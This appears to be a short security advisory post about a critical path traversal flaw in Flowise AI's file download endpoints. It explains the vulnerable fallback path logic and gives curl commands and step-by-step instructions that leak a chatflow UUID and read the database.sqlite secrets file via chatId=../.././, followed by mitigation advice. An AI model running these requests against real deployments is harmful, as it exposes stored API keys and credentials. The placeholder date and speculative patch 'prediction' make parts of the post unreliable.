Listen to this Post
The vulnerability exploits insufficient validation of the `chatId` parameter in the `/api/v1/get-upload-file` and `/api/v1/openai-assistants-file/download` endpoints. The `streamStorageFile` function validates `chatflowId` as a UUID and sanitizes `fileName` but performs no checks on chatId. The final file path is initially validated to be within the `/root/.flowise/storage` directory. However, a fallback mechanism exists: if a file is not found, the `orgId` is removed from the path and a second read attempt is made. This fallback path is constructed as `path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename)` and is checked after the initial path traversal guard. By providing a `chatId` value like ../.././, an attacker can traverse up to the parent directory (/root/.flowise/) and read critical files like database.sqlite, which contains all application secrets and API keys in the default configuration.
Platform: Flowise AI
Version: <=1.7.0
Vulnerability: Path Traversal
Severity: Critical
date: 2024-xx-xx
Prediction: Patch by 2024-12-01
What Undercode Say:
curl -X POST "http://target:3000/api/v1/vector/upsert/" -F "files=@malicious"
curl -G "http://target:3000/api/v1/get-upload-file" --data-urlencode "chatflowId=LEAKED_UUID" --data-urlencode "chatId=../.././" --data-urlencode "fileName=database.sqlite"
// streamStorageFile fallback logic
const fallbackPath = path.join(getStoragePath(), chatflowId, chatId, sanitizedFilename);
if (fs.existsSync(fallbackPath)) {
// Vulnerable file read
}
How Exploit:
- Leak a valid `chatflowId` UUID via the verbose error from
/api/v1/vector/upsert/. - Use the leaked UUID and a crafted `chatId` parameter (e.g.,
../.././) to traverse to the `/root/.flowise/` directory. - Read the `database.sqlite` file or any other local file.
Protection from this CVE
Apply vendor patch. Immediately restrict network access to Flowise. Implement strict input validation for the `chatId` parameter, rejecting any values containing path traversal sequences (../). Ensure the application runs with a dedicated low-privilege user account with minimal filesystem access.
Impact:
Complete compromise of all application data, including exposure of all stored API keys, leading to full administrative access and potential lateral movement within the environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

